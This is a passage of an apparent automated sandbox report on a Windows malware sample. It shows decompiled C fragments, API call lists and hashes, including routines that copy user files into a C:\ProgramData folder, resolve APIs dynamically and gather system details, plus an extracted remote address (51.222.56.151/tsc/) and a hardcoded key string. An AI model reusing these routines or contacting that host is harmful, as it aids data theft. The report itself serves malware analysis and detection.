                                                                                                                              • Opcode Fuzzy Hash: 9201f6ce15df5f6a9cd88ef2443e8a01273e9c839cdc465c899d99a4fb38a6a3
                                                                                                                              • Instruction Fuzzy Hash: 5C611EB4A0020ADFDB14CF54C654BAEB7B1BB44315F24825AE905BB381C3B4DE92DFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B7B0, Relevance: 7.6, APIs: 5, Instructions: 121fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0041B7F6
                                                                                                                              • _memset.LIBCMT ref: 0041B80A
                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0041B936
                                                                                                                                • Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8
                                                                                                                              • _fprintf.LIBCMT ref: 0041B8E8
                                                                                                                              • _fprintf.LIBCMT ref: 0041B8FC
                                                                                                                                • Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
                                                                                                                                • Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
                                                                                                                                • Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
                                                                                                                                • Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File_fprintf$CopyDelete__fsopen__ftbuf__lock_file__output_l__stbuf_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3156343301-0
                                                                                                                              • Opcode ID: 31ee0b0fae2133c2ba39f27a9a6c802c3e5941c70c0fd2532d29284dcd6748d0
                                                                                                                              • Instruction ID: e8761a1d6595843f783b96905d13a4169cfc93f9c27205834795f2e7f4044694
                                                                                                                              • Opcode Fuzzy Hash: 31ee0b0fae2133c2ba39f27a9a6c802c3e5941c70c0fd2532d29284dcd6748d0
                                                                                                                              • Instruction Fuzzy Hash: 484172B5D00208BBCB14EFA4ED89EEE7378FB48304F0445A9F60697281D775AA54CF99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041D650, Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 61%
                                                                                                                              			E0041D650(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v276;
				char _v540;
				signed int _t14;
				intOrPtr _t26;
				intOrPtr _t34;
				intOrPtr _t37;
				signed int _t43;

				_t42 = __esi;
				_t41 = __edi;
				_t31 = __ebx;
				_t14 =  *0x4301f4; // 0xe687535
				_v8 = _t14 ^ _t43;
				E004091C0( &_v540, 0, 0x104);
				E004091C0( &_v276, 0, 0x104);
				E0041A380( &_v540, 0x1a); // executed
				 *0x4328c4( &_v540, _a4);
				 *0x4328c4( &_v276,  &_v540);
				_t34 =  *0x432240; // 0x2336210
				_t40 =  &_v276;
				 *0x4328c4( &_v276, _t34);
				_t26 = E0041A6E0( &_v276); // executed
				if(_t26 != 0) {
					_t37 =  *0x432570; // 0x2330560
					if(E0041C690(__ebx, __edi, __esi, _t37) != 0) {
						_t40 = _a8;
						E0041D360(__ebx, __edi, __esi, 0x42945d,  &_v540, _a8);
					}
					_t26 = E0041C650();
				}
				return E00404354(_t26, _t31, _v8 ^ _t43, _t40, _t41, _t42);
			}











                                                                                                                              0x0041d650
                                                                                                                              0x0041d650
                                                                                                                              0x0041d650
                                                                                                                              0x0041d659
                                                                                                                              0x0041d660
                                                                                                                              0x0041d671
                                                                                                                              0x0041d687
                                                                                                                              0x0041d698
                                                                                                                              0x0041d6ab
                                                                                                                              0x0041d6bf
                                                                                                                              0x0041d6c5
                                                                                                                              0x0041d6cc
                                                                                                                              0x0041d6d3
                                                                                                                              0x0041d6e0
                                                                                                                              0x0041d6ea
                                                                                                                              0x0041d6ec
                                                                                                                              0x0041d6fd
                                                                                                                              0x0041d6ff
                                                                                                                              0x0041d70f
                                                                                                                              0x0041d714
                                                                                                                              0x0041d717
                                                                                                                              0x0041d717
                                                                                                                              0x0041d729

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041D671
                                                                                                                              • _memset.LIBCMT ref: 0041D687
                                                                                                                                • Part of subcall function 0041A380: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0041A39D
                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0041D6AB
                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0041D6BF
                                                                                                                              • lstrcat.KERNEL32(?,02336210), ref: 0041D6D3
                                                                                                                                • Part of subcall function 0041A6E0: GetFileAttributesA.KERNEL32(?), ref: 0041A6EA
                                                                                                                                • Part of subcall function 0041C690: __wgetenv.LIBCMT ref: 0041C6A6
                                                                                                                                • Part of subcall function 0041C690: LoadLibraryA.KERNEL32(023314D8), ref: 0041C708
                                                                                                                                • Part of subcall function 0041C690: GetProcAddress.KERNEL32(00000000,02335900), ref: 0041C72D
                                                                                                                                • Part of subcall function 0041C690: GetProcAddress.KERNEL32(00000000,023359D8), ref: 0041C746
                                                                                                                                • Part of subcall function 0041C690: GetProcAddress.KERNEL32(00000000,02335F90), ref: 0041C75E
                                                                                                                                • Part of subcall function 0041C690: GetProcAddress.KERNEL32(00000000,02335918), ref: 0041C776
                                                                                                                                • Part of subcall function 0041C690: GetProcAddress.KERNEL32(00000000,02335FB0), ref: 0041C78F
                                                                                                                                • Part of subcall function 0041C690: GetProcAddress.KERNEL32(00000000,023359F0), ref: 0041C7A7
                                                                                                                                • Part of subcall function 0041D360: wsprintfA.USER32 ref: 0041D385
                                                                                                                                • Part of subcall function 0041D360: FindFirstFileA.KERNEL32(?,?), ref: 0041D39C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$lstrcat$File_memset$AttributesFindFirstFolderLibraryLoadPath__wgetenvwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1612030115-0
                                                                                                                              • Opcode ID: e388588dc243cc71f73e8d93367709d7acdf1f86ee30b6db14fbab7ecf610c90
                                                                                                                              • Instruction ID: 49756a93a91f06ebf003bdda9be0c0177cda1d93663878ce3007f740a3bf9368
                                                                                                                              • Opcode Fuzzy Hash: e388588dc243cc71f73e8d93367709d7acdf1f86ee30b6db14fbab7ecf610c90
                                                                                                                              • Instruction Fuzzy Hash: 9511DDF6E4010CA7CB14EBA0DC86FDE7378AB18304F0406ADBA0957181EA74DBC4CBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041AFE0, Relevance: 7.5, APIs: 5, Instructions: 46memorytimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 85%
                                                                                                                              			E0041AFE0(intOrPtr __ebx, CHAR* __edx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				struct _TIME_ZONE_INFORMATION _v188;
				void* _v192;
				long _v196;
				signed int _t17;
				long _t23;
				CHAR* _t29;
				intOrPtr _t31;
				CHAR* _t36;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;

				_t39 = __esi;
				_t38 = __edi;
				_t36 = __edx;
				_t31 = __ebx;
				_t17 =  *0x4301f4; // 0xe687535
				_v8 = _t17 ^ _t40;
				_v192 = HeapAlloc(GetProcessHeap(), 0, 0x104);
				_v188.Bias = 0;
				E004091C0( &(_v188.StandardName), 0, 0xa8);
				_t23 = GetTimeZoneInformation( &_v188); // executed
				_v196 = _t23;
				if(_v196 != 0xffffffff) {
					asm("cdq");
					_t36 =  *0x4324cc; // 0x2336790
					wsprintfA(_v192, _t36,  ~(_v188.Bias) / 0x3c);
					_t29 = _v192;
				} else {
					_t29 = _v192;
				}
				return E00404354(_t29, _t31, _v8 ^ _t40, _t36, _t38, _t39);
			}















                                                                                                                              0x0041afe0
                                                                                                                              0x0041afe0
                                                                                                                              0x0041afe0
                                                                                                                              0x0041afe0
                                                                                                                              0x0041afe9
                                                                                                                              0x0041aff0
                                                                                                                              0x0041b007
                                                                                                                              0x0041b00d
                                                                                                                              0x0041b025
                                                                                                                              0x0041b034
                                                                                                                              0x0041b03a
                                                                                                                              0x0041b047
                                                                                                                              0x0041b059
                                                                                                                              0x0041b062
                                                                                                                              0x0041b070
                                                                                                                              0x0041b079
                                                                                                                              0x0041b049
                                                                                                                              0x0041b049
                                                                                                                              0x0041b049
                                                                                                                              0x0041b08c

                                                                                                                              APIs
                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0041AFFA
                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041B001
                                                                                                                              • _memset.LIBCMT ref: 0041B025
                                                                                                                              • GetTimeZoneInformation.KERNEL32(00000000), ref: 0041B034
                                                                                                                              • wsprintfA.USER32 ref: 0041B070
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$AllocInformationProcessTimeZone_memsetwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3962126076-0
                                                                                                                              • Opcode ID: f04ae1eec3cd3d8f71b6e0b8e1ba63e6537d3239d06e5d4a1eda5fe36536eada
                                                                                                                              • Instruction ID: a38f8acdfa9d2068cb0a8f8de2786d5a5190629af5dbd92f4f3d6e32fc3f7771
                                                                                                                              • Opcode Fuzzy Hash: f04ae1eec3cd3d8f71b6e0b8e1ba63e6537d3239d06e5d4a1eda5fe36536eada
                                                                                                                              • Instruction Fuzzy Hash: F0116170A00318DBEB54EF64DD49F99B7B9EB08304F0042A9E909E7291DB749E88CF56
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00422F70, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 85%
                                                                                                                              			E00422F70(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, void* __eflags, char _a4) {
				long _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v76;
				char _v104;
				void* _v108;
				void* _v112;
				signed int _t27;
				long _t36;
				void* _t38;
				void* _t39;
				signed int _t65;

				_push(0xffffffff);
				_push(E0042658C);
				_push( *[fs:0x0]);
				_t27 =  *0x4301f4; // 0xe687535
				_v20 = _t27 ^ _t65;
				 *[fs:0x0] =  &_v16;
				E004011C0( &_v104,  *0x432354); // executed
				_v8 = 0;
				_t5 =  &_a4; // 0x42307d
				E004011C0( &_v48,  *_t5);
				_v8 = 1;
				E00422D00(__ebx, __edi, __esi,  &_v76,  &_v48); // executed
				_v8 = 3;
				E004012D0( &_v48);
				_t36 = E00401350( &_v76);
				_t38 = RtlAllocateHeap(GetProcessHeap(), 0, _t36); // executed
				_v108 = _t38;
				_t39 = E00401330( &_v104);
				E00422980(__ebx, E00401330( &_v76), _t39,  &_v108); // executed
				_v112 = _v108;
				_v8 = 0;
				E004012D0( &_v76);
				_v8 = 0xffffffff;
				E004012D0( &_v104);
				 *[fs:0x0] = _v16;
				return E00404354(_v112, __ebx, _v20 ^ _t65, _v108, __edi, __esi, _t27 ^ _t65);
			}
















                                                                                                                              0x00422f73
                                                                                                                              0x00422f75
                                                                                                                              0x00422f80
                                                                                                                              0x00422f84
                                                                                                                              0x00422f8b
                                                                                                                              0x00422f92
                                                                                                                              0x00422fa1
                                                                                                                              0x00422fa6
                                                                                                                              0x00422fad
                                                                                                                              0x00422fb4
                                                                                                                              0x00422fb9
                                                                                                                              0x00422fc5
                                                                                                                              0x00422fcd
                                                                                                                              0x00422fd4
                                                                                                                              0x00422fdc
                                                                                                                              0x00422feb
                                                                                                                              0x00422ff1
                                                                                                                              0x00422ffb
                                                                                                                              0x0042300a
                                                                                                                              0x00423015
                                                                                                                              0x00423018
                                                                                                                              0x0042301f
                                                                                                                              0x00423024
                                                                                                                              0x0042302e
                                                                                                                              0x00423039
                                                                                                                              0x0042304e

                                                                                                                              APIs
                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,0E687535), ref: 00422FE4
                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,0E687535), ref: 00422FEB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                              • String ID: 51.222.56.151/tsc/$}0B
                                                                                                                              • API String ID: 1357844191-2330486834
                                                                                                                              • Opcode ID: 76a1a9754337881a8685aedcb8487fecfc12b9da713792be4f5337c78b4039f5
                                                                                                                              • Instruction ID: b6d434c4cba67818d2f1409031ea5769ef2511f09741796fe981391f882f5437
                                                                                                                              • Opcode Fuzzy Hash: 76a1a9754337881a8685aedcb8487fecfc12b9da713792be4f5337c78b4039f5
                                                                                                                              • Instruction Fuzzy Hash: F1213D71D00208EBCB09EBA5D951BDEB7B8EF14304F50426EF416B72E1DB386A08CB58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00424E20, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 50%
                                                                                                                              			E00424E20(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				signed int _v8;
				char _v276;
				char _v540;
				signed int _t17;
				intOrPtr _t32;
				signed int _t49;
				void* _t55;

				_t55 = __eflags;
				_t17 =  *0x4301f4; // 0xe687535
				_v8 = _t17 ^ _t49;
				E004091C0( &_v276, 0, 0x104);
				E0041A380( &_v276, 0x1a); // executed
				 *0x4328c4( &_v276, _a8);
				E004091C0( &_v540, 0, 0x104);
				 *0x4328c4( &_v540, 0x431f98);
				 *0x4328c4( &_v540,  *0x4320c4);
				 *0x4328c4(_a4);
				CreateDirectoryA( &_v540, 0); // executed
				_t14 =  &_a12; // 0x424f3f
				_t32 = E00424D00(__ebx,  &_v276, __edi, __esi, _t55, 0x4294ed,  &_v276,  *_t14, _a8, _a4); // executed
				return E00404354(_t32, __ebx, _v8 ^ _t49,  &_v276, __edi, __esi,  &_v540);
			}










                                                                                                                              0x00424e20
                                                                                                                              0x00424e29
                                                                                                                              0x00424e30
                                                                                                                              0x00424e41
                                                                                                                              0x00424e52
                                                                                                                              0x00424e65
                                                                                                                              0x00424e79
                                                                                                                              0x00424e8d
                                                                                                                              0x00424ea0
                                                                                                                              0x00424eb1
                                                                                                                              0x00424ec0
                                                                                                                              0x00424ece
                                                                                                                              0x00424ede
                                                                                                                              0x00424ef3

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 00424E41
                                                                                                                              • _memset.LIBCMT ref: 00424E79
                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00424EC0
                                                                                                                                • Part of subcall function 00424D00: SetCurrentDirectoryA.KERNEL32(?), ref: 00424D17
                                                                                                                                • Part of subcall function 00424D00: __findfirst64i32.LIBCMT ref: 00424D26
                                                                                                                                • Part of subcall function 00424D00: _memset.LIBCMT ref: 00424D49
                                                                                                                                • Part of subcall function 00424D00: _memset.LIBCMT ref: 00424D5F
                                                                                                                                • Part of subcall function 00424D00: CopyFileA.KERNEL32(?,?,00000001), ref: 00424DE3
                                                                                                                                • Part of subcall function 00424D00: __findnext64i32.LIBCMT ref: 00424DF2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$Directory$CopyCreateCurrentFile__findfirst64i32__findnext64i32
                                                                                                                              • String ID: ?OB
                                                                                                                              • API String ID: 2934950934-1061488841
                                                                                                                              • Opcode ID: f4b3a7596f8fdaf2e76ed6f01339550422c745ecdc72c7ec85b9adf5198f2bbc
                                                                                                                              • Instruction ID: ea5f56cdc59ae128c86347322f49a49318d30f91748238401bf9afd0c7f447a2
                                                                                                                              • Opcode Fuzzy Hash: f4b3a7596f8fdaf2e76ed6f01339550422c745ecdc72c7ec85b9adf5198f2bbc
                                                                                                                              • Instruction Fuzzy Hash: E121EBB2A4011CABCB18EF90DD86FDA7378AB5C304F044699B705571C1DB749A84CFA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00421620, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 82%
                                                                                                                              			E00421620(intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _t36;

				_v12 = __ecx;
				E004091C0(_v12, 0, 0x148);
				 *((intOrPtr*)(_v12 + 0xc)) = _a4;
				E0040512D(_v12 + 0x10, 0x14, "1BEF0A57BE110FD467A");
				 *((intOrPtr*)(_v12 + 4)) = 0x7a120;
				_push( *((intOrPtr*)(_v12 + 4))); // executed
				_t36 = E00404349(__edi, __esi, _v12 + 0x10); // executed
				_v8 = _t36;
				 *_v12 = _v8;
				E004091C0( *_v12, 0,  *((intOrPtr*)(_v12 + 4)));
				 *((intOrPtr*)(_v12 + 0x24)) = _a8;
				 *((intOrPtr*)(_v12 + 0x38)) = _a12;
				 *((intOrPtr*)(_v12 + 0x3c)) = _a16;
				 *((intOrPtr*)(_v12 + 0x40)) = _a20;
				return _v12;
			}






                                                                                                                              0x00421626
                                                                                                                              0x00421634
                                                                                                                              0x00421642
                                                                                                                              0x00421653
                                                                                                                              0x0042165e
                                                                                                                              0x0042166b
                                                                                                                              0x0042166c
                                                                                                                              0x00421674
                                                                                                                              0x0042167d
                                                                                                                              0x0042168e
                                                                                                                              0x0042169c
                                                                                                                              0x004216a5
                                                                                                                              0x004216ae
                                                                                                                              0x004216b7
                                                                                                                              0x004216c0

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$_strcpy_s
                                                                                                                              • String ID: 1BEF0A57BE110FD467A
                                                                                                                              • API String ID: 1261871945-2910601657
                                                                                                                              • Opcode ID: d87fe8be99c91be2f0ec4594f2017e1b0badc189c50b59529de3995b92fdd1c8
                                                                                                                              • Instruction ID: 2172e71b973282a083bc5586dc99c640534b7d7a8ff33a094392bb0c867027d6
                                                                                                                              • Opcode Fuzzy Hash: d87fe8be99c91be2f0ec4594f2017e1b0badc189c50b59529de3995b92fdd1c8
                                                                                                                              • Instruction Fuzzy Hash: 5521BDB8E00208AFDB04DF95D48599EBBB5EF88314F1081A9E944AB381D675EE51CB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00421620, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 82%
                                                                                                                              			E00421620(intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _t36;

				_v12 = __ecx;
				E004091C0(_v12, 0, 0x148);
				 *((intOrPtr*)(_v12 + 0xc)) = _a4;
				E0040512D(_v12 + 0x10, 0x14, "1BEF0A57BE110FD467A");
				 *((intOrPtr*)(_v12 + 4)) = 0x7a120;
				_push( *((intOrPtr*)(_v12 + 4))); // executed
				_t36 = E00404349(__edi, __esi, _v12 + 0x10); // executed
				_v8 = _t36;
				 *_v12 = _v8;
				E004091C0( *_v12, 0,  *((intOrPtr*)(_v12 + 4)));
				 *((intOrPtr*)(_v12 + 0x24)) = _a8;
				 *((intOrPtr*)(_v12 + 0x38)) = _a12;
				 *((intOrPtr*)(_v12 + 0x3c)) = _a16;
				 *((intOrPtr*)(_v12 + 0x40)) = _a20;
				return _v12;
			}






                                                                                                                              0x00421626
                                                                                                                              0x00421634
                                                                                                                              0x00421642
                                                                                                                              0x00421653
                                                                                                                              0x0042165e
                                                                                                                              0x0042166b
                                                                                                                              0x0042166c
                                                                                                                              0x00421674
                                                                                                                              0x0042167d
                                                                                                                              0x0042168e
                                                                                                                              0x0042169c
                                                                                                                              0x004216a5
                                                                                                                              0x004216ae
                                                                                                                              0x004216b7
                                                                                                                              0x004216c0

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$_strcpy_s
                                                                                                                              • String ID: 1BEF0A57BE110FD467A
                                                                                                                              • API String ID: 1261871945-2910601657
                                                                                                                              • Opcode ID: d87fe8be99c91be2f0ec4594f2017e1b0badc189c50b59529de3995b92fdd1c8
                                                                                                                              • Instruction ID: 2172e71b973282a083bc5586dc99c640534b7d7a8ff33a094392bb0c867027d6
                                                                                                                              • Opcode Fuzzy Hash: d87fe8be99c91be2f0ec4594f2017e1b0badc189c50b59529de3995b92fdd1c8
                                                                                                                              • Instruction Fuzzy Hash: 5521BDB8E00208AFDB04DF95D48599EBBB5EF88314F1081A9E944AB381D675EE51CB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041CC40, Relevance: 6.1, APIs: 4, Instructions: 77filememoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 47%
                                                                                                                              			E0041CC40(CHAR* _a4, void** _a8, long* _a12) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				intOrPtr _v24;
				long _v28;
				long _v32;
				void* _t30;
				void* _t36;
				int _t39;

				_v8 = 0;
				_v16 = 0;
				_t30 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v16 = _t30;
				if(_v16 == 0 || _v16 == 0xffffffff) {
					L12:
					return _v8;
				} else {
					_push( &_v28);
					_push(_v16);
					if( *0x43276c() != 0 && _v24 == 0) {
						 *_a12 = _v28;
						_t36 = LocalAlloc(0x40,  *_a12); // executed
						 *_a8 = _t36;
						if( *_a8 != 0) {
							_t39 = ReadFile(_v16,  *_a8,  *_a12,  &_v12, 0); // executed
							if(_t39 == 0 ||  *_a12 != _v12) {
								_v32 = 0;
							} else {
								_v32 = 1;
							}
							_v8 = _v32;
							if(_v8 == 0) {
								 *0x432904( *_a8);
							}
						}
					}
					FindCloseChangeNotification(_v16); // executed
					goto L12;
				}
			}












                                                                                                                              0x0041cc46
                                                                                                                              0x0041cc4d
                                                                                                                              0x0041cc67
                                                                                                                              0x0041cc6d
                                                                                                                              0x0041cc74
                                                                                                                              0x0041cd1b
                                                                                                                              0x0041cd21
                                                                                                                              0x0041cc84
                                                                                                                              0x0041cc87
                                                                                                                              0x0041cc8b
                                                                                                                              0x0041cc94
                                                                                                                              0x0041cca2
                                                                                                                              0x0041ccac
                                                                                                                              0x0041ccb5
                                                                                                                              0x0041ccbd
                                                                                                                              0x0041ccd5
                                                                                                                              0x0041ccdd
                                                                                                                              0x0041ccf2
                                                                                                                              0x0041cce9
                                                                                                                              0x0041cce9
                                                                                                                              0x0041cce9
                                                                                                                              0x0041ccfc
                                                                                                                              0x0041cd03
                                                                                                                              0x0041cd0b
                                                                                                                              0x0041cd0b
                                                                                                                              0x0041cd03
                                                                                                                              0x0041ccbd
                                                                                                                              0x0041cd15
                                                                                                                              0x00000000
                                                                                                                              0x0041cd15

                                                                                                                              APIs
                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041CC67
                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0041CCAC
                                                                                                                              • ReadFile.KERNEL32(000000FF,?,000000FF,?,00000000), ref: 0041CCD5
                                                                                                                              • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0041CD15
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AllocChangeCloseCreateFindLocalNotificationRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 499999627-0
                                                                                                                              • Opcode ID: c62c7f298a1c69f85d1575dc99edec89cbbdff588b99ba0947f24c182081f3e6
                                                                                                                              • Instruction ID: ec94014e0aba5c49b0ec51f71834824b71e99b3ffa1dd42a2f7eb069ed426627
                                                                                                                              • Opcode Fuzzy Hash: c62c7f298a1c69f85d1575dc99edec89cbbdff588b99ba0947f24c182081f3e6
                                                                                                                              • Instruction Fuzzy Hash: B931DBB4A40209EFDB14DF94DD84BEEB7B5FB48300F208169E915AB390D778AA81CF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00424F00, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 269stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E00424F00(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _t5;
				intOrPtr _t7;
				intOrPtr _t9;
				intOrPtr _t11;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t33;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				void* _t68;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr _t89;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				intOrPtr _t131;
				intOrPtr _t132;
				intOrPtr _t133;
				void* _t170;

				_t135 = __esi;
				_t134 = __edi;
				_t69 = __ebx;
				E004091C0("C:\\ProgramData\\300337377349991", 0, 0x104);
				 *0x4328c4("C:\\ProgramData\\300337377349991", _a4);
				_t70 =  *0x432190; // 0x2337f68
				_t102 =  *0x43211c; // 0x2337db8
				_t5 =  *0x43211c; // 0x2337db8
				E00424E20(__ebx, __edi, __esi, _t170, _t5, _t102, _t70); // executed
				_t71 =  *0x4322e4; // 0x2337f80
				_t103 =  *0x432680; // 0x2337ff8
